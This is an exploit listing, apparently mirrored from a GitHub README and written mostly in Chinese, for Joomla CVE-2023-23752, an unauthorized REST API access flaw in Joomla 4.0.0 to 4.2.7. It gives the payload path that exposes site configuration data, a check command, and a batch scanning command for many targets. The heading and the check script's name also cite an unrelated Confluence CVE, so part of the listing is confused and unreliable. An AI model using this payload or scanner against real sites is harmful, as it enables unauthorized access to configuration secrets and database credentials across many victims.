Exploit for Improper Access Control in Joomla Joomla\! CVE-2023-23752 CVE-2022-26134

## https://sploitus.com/exploit?id=E36E0538-93A8-58B7-88EB-1117BF1CDC1E
CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability

# 脚本使用

安装python库

pip install -r requirements.txt

漏洞验证

python3 CVE-2022-26134_check.py -u url -c whoami

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/ef65c7d4-93c9-477d-86c1-f3e5d2daf288)


批量扫描

python3 CVE-2023-23752.py -f url_part.txt

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/e4125dc6-8590-4835-90ba-5c3d878dff3e)

# 影响版本

4.0.0 <= Joomla <= 4.2.7

# 漏洞复现

payload:

/api/index.php/v1/config/application?public=true

访问漏洞地址，抓包，重放数据包

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/6ee54b44-4de9-46a4-95e9-8357c6ca0aa4)

# 漏洞原理

Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当，可能导致未授权访问Rest API，造成敏感信息泄露